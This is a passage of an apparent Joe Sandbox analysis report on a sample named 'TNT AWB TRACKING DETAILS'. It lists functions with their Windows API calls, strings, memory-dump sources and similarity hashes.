                                                    • Opcode Fuzzy Hash: 8b870828cba9041b7d843090aa57a9c765cdad45e2c129f9f25fd6f7f6c6ec7d
                                                    • Instruction Fuzzy Hash: 7B41D672A04259BADF219AA1DC45FEFBBFDEF85710F000069F904B7180DAB19A05DB61
                                                    Function 00F3258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F3259E
                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00F325D4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CrackInternet_memset
                                                    • String ID: |
                                                    • API String ID: 1413715105-2343686810
                                                    • Opcode ID: 1be018c2951e0f9d6745eb6862a6ab3b63c7165cbfdf206d3bd83c8bc06b75e6
                                                    • Instruction ID: 312814bf78fc7db135d4c5afb9db1230135e299718649c026019428f251cf438
                                                    • Opcode Fuzzy Hash: 1be018c2951e0f9d6745eb6862a6ab3b63c7165cbfdf206d3bd83c8bc06b75e6
                                                    • Instruction Fuzzy Hash: 6A31F571800119ABCF41AFA1CD86EEEBFB8FF08310F10105AED55B6162EA325956DF60
                                                    Function 00F47A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00F47B61
                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F47B76
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: '
                                                    • API String ID: 3850602802-1997036262
                                                    • Opcode ID: 5228395b8401af5c81213a9aaeb72e377bb05482c2815fb98051b7db2eee70c9
                                                    • Instruction ID: 029f83b5b81f10e8b979414061645c3e204a17ea74dbb91e17e4ceb5dc7ffe89
                                                    • Opcode Fuzzy Hash: 5228395b8401af5c81213a9aaeb72e377bb05482c2815fb98051b7db2eee70c9
                                                    • Instruction Fuzzy Hash: ED411674A0530A9FDB14DF64C980BEABBB9FB08300F10016AED08EB395D730A941DF90
                                                    Function 00F46A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DestroyWindow.USER32(?,?,?,?), ref: 00F46B17
                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00F46B53
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Window$DestroyMove
                                                    • String ID: static
                                                    • API String ID: 2139405536-2160076837
                                                    • Opcode ID: 06e05cb501558bff65b032dba8f51b07f4e606d29b02162fa34f5bc4be318b7d
                                                    • Instruction ID: 8ac97b136ca0ac7c0bbd6cc44f0ce73ddaee959df7ca15f45b7dbadb78c60247
                                                    • Opcode Fuzzy Hash: 06e05cb501558bff65b032dba8f51b07f4e606d29b02162fa34f5bc4be318b7d
                                                    • Instruction Fuzzy Hash: 6531B071200604AEDB109F24CC40FFB7BA8FF89764F108519FDA9D3191DA35AC81E761
                                                    Function 00F228A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F22911
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F2294C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: InfoItemMenu_memset
                                                    • String ID: 0
                                                    • API String ID: 2223754486-4108050209
                                                    • Opcode ID: 59df7ce0288695e9ef037c543f261462e7e61a5114c439221e95e8db0458ae05
                                                    • Instruction ID: d412990b1105b682c3d8f752c0ae15fe85d771b3a1dd184e116624915b5d8a07
                                                    • Opcode Fuzzy Hash: 59df7ce0288695e9ef037c543f261462e7e61a5114c439221e95e8db0458ae05
                                                    • Instruction Fuzzy Hash: 6E319531900319BBDB64CF58ED45BEEBBF8EF45360F140019ED85AA1A1D7709984FB51
                                                    Function 00F339E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __snwprintf.LIBCMT ref: 00F33A66
                                                      • Part of subcall function 00EC7DE1: _memmove.LIBCMT ref: 00EC7E22
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: __snwprintf_memmove
                                                    • String ID: , $$AUTOITCALLVARIABLE%d
                                                    • API String ID: 3506404897-2584243854
                                                    • Opcode ID: 57514adefa8c5c8d6ee993fb37999123b2013cba6dd1af754e4b3788892010da
                                                    • Instruction ID: ae0df204e6a93a70f5f660f79a7cab66e8d3722662729da2ffee84d0571ea7bd
                                                    • Opcode Fuzzy Hash: 57514adefa8c5c8d6ee993fb37999123b2013cba6dd1af754e4b3788892010da
                                                    • Instruction Fuzzy Hash: 2921B135600219AACF10EF64CD82EAE77F4AF48760F404459F449B7182DB35EA42DB62
                                                    Function 00F466D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F46761
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F4676C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: Combobox
                                                    • API String ID: 3850602802-2096851135
                                                    • Opcode ID: d72c70f151f5f62fe9ff27ea4df360849a7a979631123b292c89a6a492a2267c
                                                    • Instruction ID: 1486ffa4b5b0c18941b4c525caaedd97e76f89c789d4214ff0b5c2cd2e93a78a
                                                    • Opcode Fuzzy Hash: d72c70f151f5f62fe9ff27ea4df360849a7a979631123b292c89a6a492a2267c
                                                    • Instruction Fuzzy Hash: A711B275600208AFEF118F54CC80EFB3F6AEB4A3A8F114129FD18D7291DA75DC51A7A1
                                                    Function 00F46C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EC1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EC1D73
                                                      • Part of subcall function 00EC1D35: GetStockObject.GDI32(00000011), ref: 00EC1D87
                                                      • Part of subcall function 00EC1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EC1D91
                                                    • GetWindowRect.USER32(00000000,?), ref: 00F46C71
                                                    • GetSysColor.USER32(00000012), ref: 00F46C8B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                    • String ID: static
                                                    • API String ID: 1983116058-2160076837
                                                    • Opcode ID: 6413996a895df98646d469dabf1575c30b71359a54ed518a78ba3c6c051576fa
                                                    • Instruction ID: 982f439875a02a162a54990d293a2d8b3e86d404bbc3f4cc6c3e1478c07cfcc9
                                                    • Opcode Fuzzy Hash: 6413996a895df98646d469dabf1575c30b71359a54ed518a78ba3c6c051576fa
                                                    • Instruction Fuzzy Hash: C0215972910209AFDF04DFA8CC85EFA7BB8FB09315F004628FE95D2250D635E850EB61
                                                    Function 00F46920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowTextLengthW.USER32(00000000), ref: 00F469A2
                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00F469B1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: LengthMessageSendTextWindow
                                                    • String ID: edit
                                                    • API String ID: 2978978980-2167791130
                                                    • Opcode ID: 3d4d8126c51a88263a8e8ba0f0562b490845c114c017d3667b01f67379d834ed
                                                    • Instruction ID: c1db42d61404b649b85bea4303e17bdf901a4625d25a3a4855a35d7b42fd0e3d
                                                    • Opcode Fuzzy Hash: 3d4d8126c51a88263a8e8ba0f0562b490845c114c017d3667b01f67379d834ed
                                                    • Instruction Fuzzy Hash: 73116A72910208ABEB108E649C40AEB3BA9EB163B4F504728FDA5D61E0C6B5DC95B761
                                                    Function 00F229AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F22A22
                                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00F22A41
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: InfoItemMenu_memset
                                                    • String ID: 0
                                                    • API String ID: 2223754486-4108050209
                                                    • Opcode ID: 7dc961dfd1d259402f3da950f265f6b1531a465481471eb8c5ed05518c82a36b
                                                    • Instruction ID: 177f575127601c14a2402149b2c127aef8fe758196691eed889c42ca77de78d4
                                                    • Opcode Fuzzy Hash: 7dc961dfd1d259402f3da950f265f6b1531a465481471eb8c5ed05518c82a36b
                                                    • Instruction Fuzzy Hash: 4F11E932D01138BBCB74DB98EC44BEA73B8AB46720F044021E955EB250D774AD05EB91
                                                    Function 00F321D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00F3222C
                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00F32255
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Internet$OpenOption
                                                    • String ID: <local>
                                                    • API String ID: 942729171-4266983199
                                                    • Opcode ID: 7fc5bb8eae7fdce42b24d4c778c0f6a21a7839fefba9e0dbf85cfed258538f73
                                                    • Instruction ID: f408681472362248874d6a6e4ce2ab8c5508d3a2290f0c37f868ba44faec9614
                                                    • Opcode Fuzzy Hash: 7fc5bb8eae7fdce42b24d4c778c0f6a21a7839fefba9e0dbf85cfed258538f73
                                                    • Instruction Fuzzy Hash: AE11C271941225BAEB658F518C88FBBFFA8FF16771F10822AF91986000D3709995E6F1
                                                    Function 00F18E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EC7DE1: _memmove.LIBCMT ref: 00EC7E22
                                                      • Part of subcall function 00F1AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F1AABC
                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00F18E73
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ClassMessageNameSend_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 372448540-1403004172
                                                    • Opcode ID: a0359968c7f401d9a018bfb42a9f15549e84f3f321401b51823639c87ff93efd
                                                    • Instruction ID: 749e43778f2de1a3ca79719e48944a8f8d9513ba74bf63f464439df7152637a8
                                                    • Opcode Fuzzy Hash: a0359968c7f401d9a018bfb42a9f15549e84f3f321401b51823639c87ff93efd
                                                    • Instruction Fuzzy Hash: 6B016872A01219ABCB04FBE0CD51DFE33A8EF463A0F100619F836A72D1DE365849E751
                                                    Function 00F4DDE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: 3c$_
                                                    • API String ID: 4104443479-4099079164
                                                    • Opcode ID: fb5f5530c1f182dccda8f4a7becdfd004d30e81ed8310b18fc69547ab2fde054
                                                    • Instruction ID: 8c936ce881db1886e6b5aaad4780aee04d16898c282ce39ad8e16363c267ebd7
                                                    • Opcode Fuzzy Hash: fb5f5530c1f182dccda8f4a7becdfd004d30e81ed8310b18fc69547ab2fde054
                                                    • Instruction Fuzzy Hash: 5301C432600B058FD730CE6CDD90A1A7BF9BB453557100D3EE542DAA10EBB0F804AB00
                                                    Function 00F18CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EC7DE1: _memmove.LIBCMT ref: 00EC7E22
                                                      • Part of subcall function 00F1AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F1AABC
                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00F18D6B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ClassMessageNameSend_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 372448540-1403004172
                                                    • Opcode ID: db3d9efde7d00939fd00e0aac930beaf6e39a13972143c02f80400508232caad
                                                    • Instruction ID: c39e2c10fbcd9f359873eb8ae9972b2728269eede48b7acab0924ef716a61ef9
                                                    • Opcode Fuzzy Hash: db3d9efde7d00939fd00e0aac930beaf6e39a13972143c02f80400508232caad
                                                    • Instruction Fuzzy Hash: 5701F772A41209ABCB14EBE0CE52FFE77A8DF15390F100019B816B32D1DE255E49E672
                                                    Function 00F18D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EC7DE1: _memmove.LIBCMT ref: 00EC7E22
                                                      • Part of subcall function 00F1AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F1AABC
                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00F18DEE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ClassMessageNameSend_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 372448540-1403004172
                                                    • Opcode ID: 034ba9fe09997564eb429f78917e039d048e9d2f06c3b0d777edf9391974a51d
                                                    • Instruction ID: ea7f6415466de5e9f5b430e5e7c5e63350e2406b78344e41dd0748cd73b7bb14
                                                    • Opcode Fuzzy Hash: 034ba9fe09997564eb429f78917e039d048e9d2f06c3b0d777edf9391974a51d
                                                    • Instruction Fuzzy Hash: 8901F772A41209A7CB14E6A4CA52FFE77A88F16390F104019B816B3291DE255E4AF672
                                                    Function 00F24F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ClassName_wcscmp
                                                    • String ID: #32770
                                                    • API String ID: 2292705959-463685578
                                                    • Opcode ID: 9e543951038ade6e284e3d36e4b38c95dce50f299f20989efc19b7ffaadb96e7
                                                    • Instruction ID: 0a522983e4b18dfede1d006bca6f1a7c2a2c4a968bcdceacd595fa42b781cc14
                                                    • Opcode Fuzzy Hash: 9e543951038ade6e284e3d36e4b38c95dce50f299f20989efc19b7ffaadb96e7
                                                    • Instruction Fuzzy Hash: ACE0D832A0023C6BD7209BA9EC49FA7F7ECEB95B70F000067FD04D7151D960AA458BE1
                                                    Function 00EFB2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EFB314: _memset.LIBCMT ref: 00EFB321
                                                      • Part of subcall function 00EE0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00EFB2F0,?,?,?,00EC100A), ref: 00EE0945
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,00EC100A), ref: 00EFB2F4
                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00EC100A), ref: 00EFB303
                                                    Strings
                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00EFB2FE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                    • API String ID: 3158253471-631824599
                                                    • Opcode ID: e2ba3cc8d2c326b810c4a78140bfdc8191f182fc41750c6c673a18465f36ab3f
                                                    • Instruction ID: a6022f42369ab7b27022122f4012d85ab3efa02c51099824ea516d97607c23be
                                                    • Opcode Fuzzy Hash: e2ba3cc8d2c326b810c4a78140bfdc8191f182fc41750c6c673a18465f36ab3f
                                                    • Instruction Fuzzy Hash: C1E09274601748CFD760DF28D5047527BE4AF50758F01893DE89AD7241EBF5D448DBA1
                                                    Function 00F17C74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00F17C82
